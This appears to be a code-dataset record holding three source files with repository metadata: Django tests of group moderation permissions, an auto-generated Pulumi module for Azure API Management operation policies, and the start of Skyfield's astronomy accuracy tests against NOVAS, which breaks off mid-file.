| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
589cca608559d9a6b011ed6cbb7686d68fba4700
| 2,209
|
py
|
Python
|
website/canvas/tests/test_authorization.py
|
bopopescu/drawquest-web
|
8d8f9149b6efeb65202809a5f8916386f58a1b3b
|
[
"BSD-3-Clause"
] | 61
|
2015-11-10T17:13:46.000Z
|
2021-08-06T17:58:30.000Z
|
website/canvas/tests/test_authorization.py
|
bopopescu/drawquest-web
|
8d8f9149b6efeb65202809a5f8916386f58a1b3b
|
[
"BSD-3-Clause"
] | 13
|
2015-11-11T07:49:41.000Z
|
2021-06-09T03:45:31.000Z
|
website/canvas/tests/test_authorization.py
|
bopopescu/drawquest-web
|
8d8f9149b6efeb65202809a5f8916386f58a1b3b
|
[
"BSD-3-Clause"
] | 18
|
2015-11-11T04:50:04.000Z
|
2021-08-20T00:57:11.000Z
|
from canvas.tests.tests_helpers import CanvasTestCase, create_user, create_staff, create_group
class TestAuthorization(CanvasTestCase):
def test_user_cannot_moderate_group(self):
normal_user, group = create_user(), create_group()
self.assertFalse(group.can_moderate(normal_user))
def test_user_cannot_disable_group(self):
normal_user, group = create_user(), create_group()
self.assertFalse(group.can_disable(normal_user))
def test_user_cannot_modify_group(self):
normal_user, group = create_user(), create_group()
self.assertFalse(group.can_modify(normal_user))
def test_moderator_cannot_modify_group(self):
normal_user, group = create_user(), create_group()
group.moderators.add(normal_user)
self.assertFalse(group.can_modify(normal_user))
def test_staff_cannot_modify_group(self):
staff_user, group = create_staff(), create_group()
self.assertFalse(group.can_modify(staff_user))
def test_founder_can_modify_group(self):
normal_user, group = create_user(), create_group()
group.founder = normal_user
self.assertTrue(group.can_modify(normal_user))
def test_founder_can_moderate_group(self):
normal_user, group = create_user(), create_group()
group.founder = normal_user
self.assertTrue(group.can_moderate(normal_user))
def test_moderator_can_moderate_group(self):
normal_user, group = create_user(), create_group()
group.moderators.add(normal_user)
self.assertTrue(group.can_moderate(normal_user))
def test_founder_cannot_disable_group(self):
normal_user, group = create_user(), create_group()
group.founder = normal_user
self.assertFalse(group.can_disable(normal_user))
def test_staff_cannot_moderate_group(self):
staff_user, group = create_staff(), create_group()
self.assertFalse(group.can_moderate(staff_user))
def test_staff_can_disable_group(self):
staff_user, group = create_staff(), create_group()
self.assertTrue(group.can_disable(staff_user))
| 41.679245
| 94
| 0.700317
| 269
| 2,209
| 5.349442
| 0.100372
| 0.145935
| 0.114663
| 0.105629
| 0.849896
| 0.813065
| 0.792217
| 0.749131
| 0.749131
| 0.657401
| 0
| 0
| 0.21005
| 2,209
| 52
| 95
| 42.480769
| 0.824642
| 0
| 0
| 0.55
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.275
| 1
| 0.275
| false
| 0
| 0.025
| 0
| 0.325
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
543a79c40e14b4614ee77ce81f9c6d0bd99833a2
| 20,567
|
py
|
Python
|
sdk/python/pulumi_azure/apimanagement/api_operation_policy.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/apimanagement/api_operation_policy.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/apimanagement/api_operation_policy.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['ApiOperationPolicyArgs', 'ApiOperationPolicy']
@pulumi.input_type
class ApiOperationPolicyArgs:
def __init__(__self__, *,
api_management_name: pulumi.Input[str],
api_name: pulumi.Input[str],
operation_id: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
xml_content: Optional[pulumi.Input[str]] = None,
xml_link: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a ApiOperationPolicy resource.
:param pulumi.Input[str] api_management_name: The name of the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] api_name: The ID of the API Management API Operation within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] operation_id: The operation identifier within an API. Must be unique in the current API Management service instance.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] xml_content: The XML Content for this Policy.
:param pulumi.Input[str] xml_link: A link to a Policy XML Document, which must be publicly available.
"""
pulumi.set(__self__, "api_management_name", api_management_name)
pulumi.set(__self__, "api_name", api_name)
pulumi.set(__self__, "operation_id", operation_id)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if xml_content is not None:
pulumi.set(__self__, "xml_content", xml_content)
if xml_link is not None:
pulumi.set(__self__, "xml_link", xml_link)
@property
@pulumi.getter(name="apiManagementName")
def api_management_name(self) -> pulumi.Input[str]:
"""
The name of the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_management_name")
@api_management_name.setter
def api_management_name(self, value: pulumi.Input[str]):
pulumi.set(self, "api_management_name", value)
@property
@pulumi.getter(name="apiName")
def api_name(self) -> pulumi.Input[str]:
"""
The ID of the API Management API Operation within the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_name")
@api_name.setter
def api_name(self, value: pulumi.Input[str]):
pulumi.set(self, "api_name", value)
@property
@pulumi.getter(name="operationId")
def operation_id(self) -> pulumi.Input[str]:
"""
The operation identifier within an API. Must be unique in the current API Management service instance.
"""
return pulumi.get(self, "operation_id")
@operation_id.setter
def operation_id(self, value: pulumi.Input[str]):
pulumi.set(self, "operation_id", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="xmlContent")
def xml_content(self) -> Optional[pulumi.Input[str]]:
"""
The XML Content for this Policy.
"""
return pulumi.get(self, "xml_content")
@xml_content.setter
def xml_content(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "xml_content", value)
@property
@pulumi.getter(name="xmlLink")
def xml_link(self) -> Optional[pulumi.Input[str]]:
"""
A link to a Policy XML Document, which must be publicly available.
"""
return pulumi.get(self, "xml_link")
@xml_link.setter
def xml_link(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "xml_link", value)
@pulumi.input_type
class _ApiOperationPolicyState:
def __init__(__self__, *,
api_management_name: Optional[pulumi.Input[str]] = None,
api_name: Optional[pulumi.Input[str]] = None,
operation_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
xml_content: Optional[pulumi.Input[str]] = None,
xml_link: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ApiOperationPolicy resources.
:param pulumi.Input[str] api_management_name: The name of the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] api_name: The ID of the API Management API Operation within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] operation_id: The operation identifier within an API. Must be unique in the current API Management service instance.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] xml_content: The XML Content for this Policy.
:param pulumi.Input[str] xml_link: A link to a Policy XML Document, which must be publicly available.
"""
if api_management_name is not None:
pulumi.set(__self__, "api_management_name", api_management_name)
if api_name is not None:
pulumi.set(__self__, "api_name", api_name)
if operation_id is not None:
pulumi.set(__self__, "operation_id", operation_id)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if xml_content is not None:
pulumi.set(__self__, "xml_content", xml_content)
if xml_link is not None:
pulumi.set(__self__, "xml_link", xml_link)
@property
@pulumi.getter(name="apiManagementName")
def api_management_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_management_name")
@api_management_name.setter
def api_management_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "api_management_name", value)
@property
@pulumi.getter(name="apiName")
def api_name(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the API Management API Operation within the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_name")
@api_name.setter
def api_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "api_name", value)
@property
@pulumi.getter(name="operationId")
def operation_id(self) -> Optional[pulumi.Input[str]]:
"""
The operation identifier within an API. Must be unique in the current API Management service instance.
"""
return pulumi.get(self, "operation_id")
@operation_id.setter
def operation_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "operation_id", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="xmlContent")
def xml_content(self) -> Optional[pulumi.Input[str]]:
"""
The XML Content for this Policy.
"""
return pulumi.get(self, "xml_content")
@xml_content.setter
def xml_content(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "xml_content", value)
@property
@pulumi.getter(name="xmlLink")
def xml_link(self) -> Optional[pulumi.Input[str]]:
"""
A link to a Policy XML Document, which must be publicly available.
"""
return pulumi.get(self, "xml_link")
@xml_link.setter
def xml_link(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "xml_link", value)
class ApiOperationPolicy(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
api_management_name: Optional[pulumi.Input[str]] = None,
api_name: Optional[pulumi.Input[str]] = None,
operation_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
xml_content: Optional[pulumi.Input[str]] = None,
xml_link: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages an API Management API Operation Policy
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_api_operation = azure.apimanagement.ApiOperation("exampleApiOperation")
#...
example_api_operation_policy = azure.apimanagement.ApiOperationPolicy("exampleApiOperationPolicy",
api_name=example_api_operation.api_name,
api_management_name=example_api_operation.api_management_name,
resource_group_name=example_api_operation.resource_group_name,
operation_id=example_api_operation.operation_id,
xml_content=\"\"\"<policies>
<inbound>
<find-and-replace from="xyz" to="abc" />
</inbound>
</policies>
\"\"\")
```
## Import
API Management API Operation Policy can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:apimanagement/apiOperationPolicy:ApiOperationPolicy example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.ApiManagement/service/instance1/apis/api1/operations/operation1/policies/policy
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] api_management_name: The name of the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] api_name: The ID of the API Management API Operation within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] operation_id: The operation identifier within an API. Must be unique in the current API Management service instance.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] xml_content: The XML Content for this Policy.
:param pulumi.Input[str] xml_link: A link to a Policy XML Document, which must be publicly available.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ApiOperationPolicyArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an API Management API Operation Policy
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_api_operation = azure.apimanagement.ApiOperation("exampleApiOperation")
#...
example_api_operation_policy = azure.apimanagement.ApiOperationPolicy("exampleApiOperationPolicy",
api_name=example_api_operation.api_name,
api_management_name=example_api_operation.api_management_name,
resource_group_name=example_api_operation.resource_group_name,
operation_id=example_api_operation.operation_id,
xml_content=\"\"\"<policies>
<inbound>
<find-and-replace from="xyz" to="abc" />
</inbound>
</policies>
\"\"\")
```
## Import
API Management API Operation Policy can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:apimanagement/apiOperationPolicy:ApiOperationPolicy example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.ApiManagement/service/instance1/apis/api1/operations/operation1/policies/policy
```
:param str resource_name: The name of the resource.
:param ApiOperationPolicyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ApiOperationPolicyArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
api_management_name: Optional[pulumi.Input[str]] = None,
api_name: Optional[pulumi.Input[str]] = None,
operation_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
xml_content: Optional[pulumi.Input[str]] = None,
xml_link: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ApiOperationPolicyArgs.__new__(ApiOperationPolicyArgs)
if api_management_name is None and not opts.urn:
raise TypeError("Missing required property 'api_management_name'")
__props__.__dict__["api_management_name"] = api_management_name
if api_name is None and not opts.urn:
raise TypeError("Missing required property 'api_name'")
__props__.__dict__["api_name"] = api_name
if operation_id is None and not opts.urn:
raise TypeError("Missing required property 'operation_id'")
__props__.__dict__["operation_id"] = operation_id
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["xml_content"] = xml_content
__props__.__dict__["xml_link"] = xml_link
super(ApiOperationPolicy, __self__).__init__(
'azure:apimanagement/apiOperationPolicy:ApiOperationPolicy',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
api_management_name: Optional[pulumi.Input[str]] = None,
api_name: Optional[pulumi.Input[str]] = None,
operation_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
xml_content: Optional[pulumi.Input[str]] = None,
xml_link: Optional[pulumi.Input[str]] = None) -> 'ApiOperationPolicy':
"""
Get an existing ApiOperationPolicy resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] api_management_name: The name of the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] api_name: The ID of the API Management API Operation within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] operation_id: The operation identifier within an API. Must be unique in the current API Management service instance.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] xml_content: The XML Content for this Policy.
:param pulumi.Input[str] xml_link: A link to a Policy XML Document, which must be publicly available.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ApiOperationPolicyState.__new__(_ApiOperationPolicyState)
__props__.__dict__["api_management_name"] = api_management_name
__props__.__dict__["api_name"] = api_name
__props__.__dict__["operation_id"] = operation_id
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["xml_content"] = xml_content
__props__.__dict__["xml_link"] = xml_link
return ApiOperationPolicy(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="apiManagementName")
def api_management_name(self) -> pulumi.Output[str]:
"""
The name of the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_management_name")
@property
@pulumi.getter(name="apiName")
def api_name(self) -> pulumi.Output[str]:
"""
The ID of the API Management API Operation within the API Management Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "api_name")
@property
@pulumi.getter(name="operationId")
def operation_id(self) -> pulumi.Output[str]:
"""
The operation identifier within an API. Must be unique in the current API Management service instance.
"""
return pulumi.get(self, "operation_id")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="xmlContent")
def xml_content(self) -> pulumi.Output[str]:
"""
The XML Content for this Policy.
"""
return pulumi.get(self, "xml_content")
@property
@pulumi.getter(name="xmlLink")
def xml_link(self) -> pulumi.Output[Optional[str]]:
"""
A link to a Policy XML Document, which must be publicly available.
"""
return pulumi.get(self, "xml_link")
| 46.217978
| 264
| 0.666553
| 2,513
| 20,567
| 5.217668
| 0.073219
| 0.068792
| 0.085418
| 0.07047
| 0.869051
| 0.848917
| 0.837858
| 0.822224
| 0.807581
| 0.788057
| 0
| 0.004682
| 0.24199
| 20,567
| 444
| 265
| 46.322072
| 0.836369
| 0.381096
| 0
| 0.668085
| 1
| 0
| 0.11617
| 0.010474
| 0
| 0
| 0
| 0
| 0
| 1
| 0.157447
| false
| 0.004255
| 0.021277
| 0
| 0.27234
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
54439e747a1a5b637708a3b51fa9a3daedbdd519
| 134,477
|
py
|
Python
|
skyfield/tests/test_against_novas.py
|
aarose/python-skyfield
|
a6c56247d1a888f57fc442530948779cec5c1db1
|
[
"MIT"
] | null | null | null |
skyfield/tests/test_against_novas.py
|
aarose/python-skyfield
|
a6c56247d1a888f57fc442530948779cec5c1db1
|
[
"MIT"
] | null | null | null |
skyfield/tests/test_against_novas.py
|
aarose/python-skyfield
|
a6c56247d1a888f57fc442530948779cec5c1db1
|
[
"MIT"
] | null | null | null |
'Auto-generated accuracy tests vs NOVAS (see build_novas_tests.py).'
from numpy import abs, array, einsum, max
from skyfield import (earthlib, framelib, nutationlib, positionlib,
precessionlib, starlib, timelib)
from skyfield.api import JulianDate
from skyfield.constants import AU_KM, AU_M
from skyfield.data import hipparcos
from skyfield.functions import length_of
from skyfield.jpllib import Ephemeris
import de405
de405 = Ephemeris(de405)
OLD_AU = AU_KM / de405.jplephemeris.AU
one_second = 1.0 / 24.0 / 60.0 / 60.0
arcsecond = 1.0 / 60.0 / 60.0
ra_arcsecond = 24.0 / 360.0 / 60.0 / 60.0
meter = 1.0 / AU_M
def compare(value, expected_value, epsilon):
if hasattr(value, 'shape') or hasattr(expected_value, 'shape'):
assert max(abs(value - expected_value)) <= epsilon
else:
assert abs(value - expected_value) <= epsilon
def test_calendar_date_0():
compare(timelib.calendar_date(2440423.345833333), array((1969, 7, 20.345833333209157)), 0.0)
def test_calendar_date_1():
compare(timelib.calendar_date(2448031.5), array((1990, 5, 19.5)), 0.0)
def test_calendar_date_2():
compare(timelib.calendar_date(2451545.0), array((2000, 1, 1.0)), 0.0)
def test_calendar_date_3():
compare(timelib.calendar_date(2456164.5), array((2012, 8, 24.5)), 0.0)
def test_earth_rotation_angle_date0():
compare(earthlib.earth_rotation_angle(2440423.345833333) * 360.0, 243.3216078027496,
0.000001 * arcsecond)
def test_earth_rotation_angle_date1():
compare(earthlib.earth_rotation_angle(2448031.5) * 360.0, 237.5118441792128,
0.000001 * arcsecond)
def test_earth_rotation_angle_date2():
compare(earthlib.earth_rotation_angle(2451545.0) * 360.0, 280.46061837504,
0.000001 * arcsecond)
def test_earth_rotation_angle_date3():
compare(earthlib.earth_rotation_angle(2456164.5) * 360.0, 333.4965831957672,
0.000001 * arcsecond)
def test_earth_tilt_date0():
compare(nutationlib.earth_tilt(JulianDate(tdb=2440423.345833333)),
array((23.443240959852666, 23.445702723464045, 0.15929455696954214, 2.604727521416375, 8.862349000962691)), 0.00001 * arcsecond)
def test_earth_tilt_date1():
compare(nutationlib.earth_tilt(JulianDate(tdb=2448031.5)),
array((23.440530953006782, 23.442178709915066, 0.7110982205507752, 11.628148141964171, 5.931924869819427)), 0.00001 * arcsecond)
def test_earth_tilt_date2():
compare(nutationlib.earth_tilt(JulianDate(tdb=2451545.0)),
array((23.439279444444445, 23.437676833867652, -0.852016747090803, -13.931996330960066, -5.769398076465291)), 0.00001 * arcsecond)
def test_earth_tilt_date3():
compare(nutationlib.earth_tilt(JulianDate(tdb=2456164.5)),
array((23.43763397776759, 23.43645066577372, 0.977087608170215, 15.976729533480038, -4.259923177932873)), 0.00001 * arcsecond)
def test_equation_of_the_equinoxes_complimentary_terms_date0():
compare(nutationlib.equation_of_the_equinoxes_complimentary_terms(2440423.345833333),
array(-1.4592438843164885e-09), 0.0000000000000001 * arcsecond)
def test_equation_of_the_equinoxes_complimentary_terms_date1():
compare(nutationlib.equation_of_the_equinoxes_complimentary_terms(2448031.5),
array(-9.909270679336256e-09), 0.0000000000000001 * arcsecond)
def test_equation_of_the_equinoxes_complimentary_terms_date2():
compare(nutationlib.equation_of_the_equinoxes_complimentary_terms(2451545.0),
array(1.021330096302465e-08), 0.0000000000000001 * arcsecond)
def test_equation_of_the_equinoxes_complimentary_terms_date3():
compare(nutationlib.equation_of_the_equinoxes_complimentary_terms(2456164.5),
array(-1.082315527387237e-08), 0.0000000000000001 * arcsecond)
def test_forward_frame_tie():
compare(framelib.ICRS_to_J2000.dot((1.1, 1.2, 1.3)), (1.100000019790573, 1.2000001208396125, 1.2999998717098593), 1e-15)
def test_reverse_frame_tie():
compare(framelib.ICRS_to_J2000.T.dot((1.1, 1.2, 1.3)), (1.0999999802094143, 1.1999998791603803, 1.300000128290131), 1e-15)
def test_fundamental_arguments_date0():
compare(nutationlib.fundamental_arguments(-0.3044942961441969),
array((-1.559784616935014, -2.8619278194907483, -2.7748368269156427, -4.947060102171707, 6.178085194718492)), 0.000000002 * arcsecond)
def test_fundamental_arguments_date1():
compare(nutationlib.fundamental_arguments(-0.09619438740588637),
array((-0.8532784044768771, -3.933579124091533, -5.376486844354831, -0.9485312704748627, 5.429677887938805)), 0.000000002 * arcsecond)
def test_fundamental_arguments_date2():
compare(nutationlib.fundamental_arguments(0.0),
array((2.355555743493879, 6.24006012692298, 1.6279050815375191, 5.198466588650503, 2.182439196615671)), 0.000000002 * arcsecond)
def test_fundamental_arguments_date3():
compare(nutationlib.fundamental_arguments(0.12647501711156742),
array((0.15181719486225662, 4.023151622222436, 0.10917837795937814, 1.6234303368860354, -2.086983188457769)), 0.000000002 * arcsecond)
def test_iau2000a_date0():
compare(nutationlib.iau2000a(2440423.345833333),
array([26047275.214163747, 88623490.00962691]), 0.001)
def test_iau2000a_date1():
compare(nutationlib.iau2000a(2448031.5),
array([116281481.4196417, 59319248.69819427]), 0.001)
def test_iau2000a_date2():
compare(nutationlib.iau2000a(2451545.0),
array([-139319963.30960065, -57693980.764652915]), 0.001)
def test_iau2000a_date3():
compare(nutationlib.iau2000a(2456164.5),
array([159767295.3348004, -42599231.779328726]), 0.001)
def test_julian_date_function_date0():
compare(timelib.julian_date(-4712, 1, 1, 0.0), 37.5, 0.0)
def test_julian_date_function_date1():
compare(timelib.julian_date(-4712, 3, 1, 0.0), 97.5, 0.0)
def test_julian_date_function_date2():
compare(timelib.julian_date(-4712, 12, 31, 0.5), 402.5208333333333, 0.0)
def test_julian_date_function_date3():
compare(timelib.julian_date(-241, 3, 25, 19.0), 1633120.2916666667, 0.0)
def test_julian_date_function_date4():
compare(timelib.julian_date(530, 9, 27, 23.5), 1914908.4791666667, 0.0)
def test_julian_date_function_date5():
compare(timelib.julian_date(1976, 3, 7, 12.5), 2442845.0208333335, 0.0)
def test_julian_date_function_date6():
compare(timelib.julian_date(2000, 1, 1, 0.0), 2451544.5, 0.0)
def test_mean_obliquity_date0():
compare(nutationlib.mean_obliquity(2440423.345833333),
84395.6674554696, 0.0) # arcseconds
def test_mean_obliquity_date1():
compare(nutationlib.mean_obliquity(2448031.5),
84385.91143082442, 0.0) # arcseconds
def test_mean_obliquity_date2():
compare(nutationlib.mean_obliquity(2451545.0),
84381.406, 0.0) # arcseconds
def test_mean_obliquity_date3():
compare(nutationlib.mean_obliquity(2456164.5),
84375.48231996332, 0.0) # arcseconds
def test_nutation_date0():
matrix = nutationlib.compute_nutation(JulianDate(tdb=2440423.345833333))
result = einsum('ij...,j...->i...', matrix, [1.1, 1.2, 1.3])
compare((1.0999795659425045, 1.1999568871469584, 1.3000570847072532),
result, 1e-14)
def test_nutation_date1():
matrix = nutationlib.compute_nutation(JulianDate(tdb=2448031.5))
result = einsum('ij...,j...->i...', matrix, [1.1, 1.2, 1.3])
compare((1.0999087778623433, 1.2000195046911977, 1.300059178938428),
result, 1e-14)
def test_nutation_date2():
matrix = nutationlib.compute_nutation(JulianDate(tdb=2451545.0))
result = einsum('ij...,j...->i...', matrix, [1.1, 1.2, 1.3])
compare((1.1001092900321017, 1.1999681897164485, 1.2999368806421698),
result, 1e-14)
def test_nutation_date3():
matrix = nutationlib.compute_nutation(JulianDate(tdb=2456164.5))
result = einsum('ij...,j...->i...', matrix, [1.1, 1.2, 1.3])
compare((1.0998746654010052, 1.2001050177909849, 1.3000091025381042),
result, 1e-14)
def test_precession_date0():
matrix = precessionlib.compute_precession(2440423.345833333)
result = einsum('ij...,j...->i...', matrix, [1.1, 1.2, 1.3])
compare((1.1119856573552391, 1.1924703352076302, 1.296727572578774),
result, 1e-15)
def test_precession_date1():
matrix = precessionlib.compute_precession(2448031.5)
result = einsum('ij...,j...->i...', matrix, [1.1, 1.2, 1.3])
compare((1.1037931405410017, 1.1976299348492718, 1.2989700697273823),
result, 1e-15)
def test_precession_date2():
matrix = precessionlib.compute_precession(2451545.0)
result = einsum('ij...,j...->i...', matrix, [1.1, 1.2, 1.3])
compare((1.1, 1.1999999999999997, 1.2999999999999998),
result, 1e-15)
def test_precession_date3():
matrix = precessionlib.compute_precession(2456164.5)
result = einsum('ij...,j...->i...', matrix, [1.1, 1.2, 1.3])
compare((1.0950034772583117, 1.203103909268923, 1.3013486728367767),
result, 1e-15)
def test_sidereal_time_on_date0():
jd = JulianDate(tt=2440423.345833333)
compare(earthlib.sidereal_time(jd), 16.195436227057314, 1e-13)
def test_sidereal_time_with_nonzero_delta_t_on_date0():
jd = JulianDate(tt=2440423.345833333 + 99.9 * one_second, delta_t=99.9)
compare(earthlib.sidereal_time(jd), 16.195436229760602, 1e-13)
def test_sidereal_time_on_date1():
jd = JulianDate(tt=2448031.5)
compare(earthlib.sidereal_time(jd), 15.825907460288224, 1e-13)
def test_sidereal_time_with_nonzero_delta_t_on_date1():
jd = JulianDate(tt=2448031.5 + 99.9 * one_second, delta_t=99.9)
compare(earthlib.sidereal_time(jd), 15.825907462991848, 1e-13)
def test_sidereal_time_on_date2():
jd = JulianDate(tt=2451545.0)
compare(earthlib.sidereal_time(jd), 18.69737482696563, 1e-13)
def test_sidereal_time_with_nonzero_delta_t_on_date2():
jd = JulianDate(tt=2451545.0 + 99.9 * one_second, delta_t=99.9)
compare(earthlib.sidereal_time(jd), 18.69737482966941, 1e-13)
def test_sidereal_time_on_date3():
jd = JulianDate(tt=2456164.5)
compare(earthlib.sidereal_time(jd), 22.243908497165812, 1e-13)
def test_sidereal_time_with_nonzero_delta_t_on_date3():
jd = JulianDate(tt=2456164.5 + 99.9 * one_second, delta_t=99.9)
compare(earthlib.sidereal_time(jd), 22.2439084998698, 1e-13)
def test_star_vector():
star = starlib.Star(ra_hours=2.530301028, dec_degrees=89.264109444,
ra_mas_per_year=44.22, dec_mas_per_year=-11.75,
parallax_mas=7.56, radial_km_per_s=-17.4)
star.au_km = de405.jplephemeris.AU
star._compute_vectors()
compare(star._position_au,
(276301.52367964364, 215517.39549460335, 27281454.18783122),
1e3 * meter)
compare(star._velocity_au_per_d,
(-0.006595734315371155, 0.015163885823867606, -0.010102577482634966),
1e-3 * meter) # TODO: was 1e-6 before switch to modern au
def test_refraction0():
r = earthlib.refraction(-5, 10, 1010)
compare(r, 0.0, 0.001 * arcsecond)
def test_refraction1():
